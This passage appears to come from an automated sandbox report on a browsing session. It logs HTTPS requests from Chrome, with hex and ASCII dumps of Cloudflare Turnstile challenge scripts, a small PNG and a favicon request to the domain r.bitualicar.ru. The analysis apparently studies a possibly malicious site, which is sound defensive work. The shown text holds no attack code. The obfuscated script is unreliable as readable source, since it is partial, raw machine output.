                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                    Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                    Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                    Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                    Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                    Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                    2025-01-15 21:50:13 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                    Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.849737104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:13 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90291484da19c332&lang=auto HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:14 UTC331INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:13 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 118599
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914896cc84390-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:14 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65
                                                                    Data Ascii: 20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_overrun_description":"Stuck%20here%3F","turnstile_refresh":"Refresh","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 2c 66 4e 2c 66 4f 2c 66 59 2c 67 39 2c 67 64 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 31 33 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 36 31 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 38 36 29 29 2f 33 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 31 38 29 29 2f 34 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 35 38 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 30 35 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 34 36 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 36 29
                                                                    Data Ascii: ,fN,fO,fY,g9,gd,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1613))/1*(parseInt(gI(861))/2)+parseInt(gI(986))/3+-parseInt(gI(1118))/4+parseInt(gI(558))/5+-parseInt(gI(905))/6+-parseInt(gI(846))/7+parseInt(gI(666)
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 5d 28 47 29 7d 7d 2c 65 54 3d 67 4a 28 31 35 35 32 29 5b 67 4a 28 31 33 34 39 29 5d 28 27 3b 27 29 2c 65 55 3d 65 54 5b 67 4a 28 35 39 39 29 5d 5b 67 4a 28 39 38 33 29 5d 28 65 54 29 2c 65 4d 5b 67 4a 28 37 38 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 67 51 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 51 3d 67 4a 2c 69 3d 7b 27 71 47 7a 67 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 62 6f 52 76 68 27 3a 67 51 28 31 31 37 37 29 2c 27 4c 77 52 41 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 27 53 66 44 48 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 67 51 28 39 36 39 29 5d 28
                                                                    Data Ascii: ](G)}},eT=gJ(1552)[gJ(1349)](';'),eU=eT[gJ(599)][gJ(983)](eT),eM[gJ(789)]=function(g,h,gQ,i,j,k,l,m){for(gQ=gJ,i={'qGzgO':function(n,o){return n+o},'boRvh':gQ(1177),'LwRAz':function(n,o){return n===o},'SfDHe':function(n,o){return n(o)}},j=Object[gQ(969)](
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6d 61 6c 4c 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 78 48 44 5a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 65 4f 74 42 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 6d 54 4a 42 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 73 61 4a 43 70 27 3a 68 61 28 35 34 34 29 2c 27 62 67 5a 4f 6d 27 3a 68 61 28 34 38 37 29 2c 27 42 65 65 79 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 68 4b 46 4d 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69
                                                                    Data Ascii: ':function(h,i){return h-i},'malLs':function(h,i){return h<<i},'xHDZc':function(h,i){return h<<i},'eOtBF':function(h,i){return h&i},'mTJBF':function(h,i){return h!==i},'saJCp':ha(544),'bgZOm':ha(487),'Beeyz':function(h,i){return h(i)},'hKFMC':function(h,i
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 28 64 5b 68 63 28 36 35 33 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 63 28 31 31 35 30 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 63 28 35 30 32 29 5d 28 38 2c 73 29 3b 48 3d 48 3c 3c 31 7c 64 5b 68 63 28 31 30 35 34 29 5d 28 4d 2c 31 29 2c 64 5b 68 63 28 31 36 32 33 29 5d 28 49 2c 64 5b 68 63 28 31 38 39 33 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 63 28 39 36 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 68 63 28 31 31 35 39 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 68 63 28 38 33 33 29 5d 28 48 2c 31 29 7c 4d 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 63 28 39 36 33 29 5d 28 6f 28 48 29 29 2c
                                                                    Data Ascii: (d[hc(653)](o,H)),H=0):I++,s++);for(M=C[hc(1150)](0),s=0;d[hc(502)](8,s);H=H<<1|d[hc(1054)](M,1),d[hc(1623)](I,d[hc(1893)](j,1))?(I=0,G[hc(963)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;d[hc(1159)](s,F);H=d[hc(833)](H,1)|M,I==j-1?(I=0,G[hc(963)](o(H)),
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 49 3d 3d 6a 2d 31 29 7b 69 66 28 64 5b 68 63 28 31 35 38 33 29 5d 28 64 5b 68 63 28 31 34 37 33 29 5d 2c 64 5b 68 63 28 31 32 30 31 29 5d 29 29 7b 47 5b 68 63 28 39 36 33 29 5d 28 64 5b 68 63 28 31 37 35 31 29 5d 28 6f 2c 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 43 2b 2b 2c 69 28 6a 2c 4a 2c 6f 2b 31 29 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 68 63 28 36 34 33 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 68 64 29 7b 72 65 74 75 72 6e 20 68 64 3d 68 61 2c 6e 75 6c 6c 3d 3d 68 3f 27 27 3a 68 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 68 64 28 34 37 38 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 68 65 29 7b 72 65 74 75 72 6e 20 68 65 3d 68 64 2c
                                                                    Data Ascii: for(;;)if(H<<=1,I==j-1){if(d[hc(1583)](d[hc(1473)],d[hc(1201)])){G[hc(963)](d[hc(1751)](o,H));break}else C++,i(j,J,o+1)}else I++;return G[hc(643)]('')},'j':function(h,hd){return hd=ha,null==h?'':h==''?null:f.i(h[hd(478)],32768,function(i,he){return he=hd,
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 64 5b 68 66 28 31 31 35 36 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 44 5b 68 66 28 36 34 33 29 5d 28 27 27 29 7d 69 66 28 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 68 66 28 31 33 36 34 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 2c 73 5b 4d 5d 29 4d 3d 73 5b 4d 5d 3b 65 6c 73 65 20 69 66 28 64 5b 68 66 28 31 35 32 30 29 5d 28 4d 2c 42 29 29 4d 3d 64 5b 68 66 28 36 38 33 29 5d 28 45 2c 45 5b 68 66 28 31 37 38 38 29 5d 28 30 29 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 68 66 28 39 36 33 29 5d 28 4d 29 2c 73 5b 42 2b 2b 5d 3d 64 5b 68 66 28 31 31 31 39 29 5d 28 45 2c 4d 5b 68 66 28 31 37 38 38 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d
                                                                    Data Ascii: <<=1);s[B++]=e(J),M=d[hf(1156)](B,1),x--;break;case 2:return D[hf(643)]('')}if(x==0&&(x=Math[hf(1364)](2,C),C++),s[M])M=s[M];else if(d[hf(1520)](M,B))M=d[hf(683)](E,E[hf(1788)](0));else return null;D[hf(963)](M),s[B++]=d[hf(1119)](E,M[hf(1788)](0)),x--,E=
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 2c 6a 5b 68 4e 28 38 36 34 29 5d 3d 68 4e 28 35 31 33 29 2c 6a 5b 68 4e 28 31 37 32 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 4e 28 31 36 38 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 68 4e 28 31 30 37 38 29 5d 3d 68 4e 28 31 33 36 30 29 2c 6a 5b 68 4e 28 37 35 30 29 5d 3d 68 4e 28 31 34 35 31 29 2c 6a 5b 68 4e 28 37 32 33 29 5d 3d 68 4e 28 31 33 36 39 29 2c 6a 5b 68 4e 28 37 37 34 29 5d 3d 68 4e 28 31 32 36 38 29 2c 6a 5b 68 4e 28 31 36 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6b 5b 68 4e 28 31 33 36 37 29 5d 28 6b 5b 68 4e 28 36 39 33 29 5d 2c 68 4e 28 31 35 36 33
                                                                    Data Ascii: ,j[hN(864)]=hN(513),j[hN(1728)]=function(G,H){return G+H},j[hN(1687)]=function(G,H){return G+H},j[hN(1078)]=hN(1360),j[hN(750)]=hN(1451),j[hN(723)]=hN(1369),j[hN(774)]=hN(1268),j[hN(1645)]=function(G,H){return G+H},j);try{if(k[hN(1367)](k[hN(693)],hN(1563
                                                                    2025-01-15 21:50:14 UTC1369INData Raw: 6f 2c 73 29 7d 2c 27 61 7a 57 67 4e 27 3a 68 4f 28 39 37 31 29 2c 27 76 44 61 52 48 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 21 3d 3d 6e 7d 2c 27 77 79 61 58 77 27 3a 68 4f 28 36 39 35 29 7d 2c 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 3f 28 66 3d 64 5b 68 4f 28 31 38 31 30 29 5d 2c 64 5b 68 4f 28 31 36 37 33 29 5d 26 26 74 79 70 65 6f 66 20 64 5b 68 4f 28 31 36 37 33 29 5d 3d 3d 3d 65 5b 68 4f 28 31 35 35 37 29 5d 29 26 26 28 6a 3d 64 5b 68 4f 28 31 36 37 33 29 5d 5b 68 4f 28 31 33 34 39 29 5d 28 27 5c 6e 27 29 2c 6a 5b 68 4f 28 34 37 38 29 5d 3e 31 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 68 4f 28 31 32 33 32 29 5d 28 6b 29 2c
                                                                    Data Ascii: o,s)},'azWgN':hO(971),'vDaRH':function(n,o){return o!==n},'wyaXw':hO(695)},d instanceof Error)?(f=d[hO(1810)],d[hO(1673)]&&typeof d[hO(1673)]===e[hO(1557)])&&(j=d[hO(1673)][hO(1349)]('\n'),j[hO(478)]>1)&&(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][hO(1232)](k),


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.849736104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:13 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:14 UTC240INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:13 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    cache-control: max-age=2629800, public
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914896b3e0f5f-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:14 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.849723104.21.86.914434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:14 UTC1316OUTGET /favicon.ico HTTP/1.1
                                                                    Host: r.bitualicar.ru
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
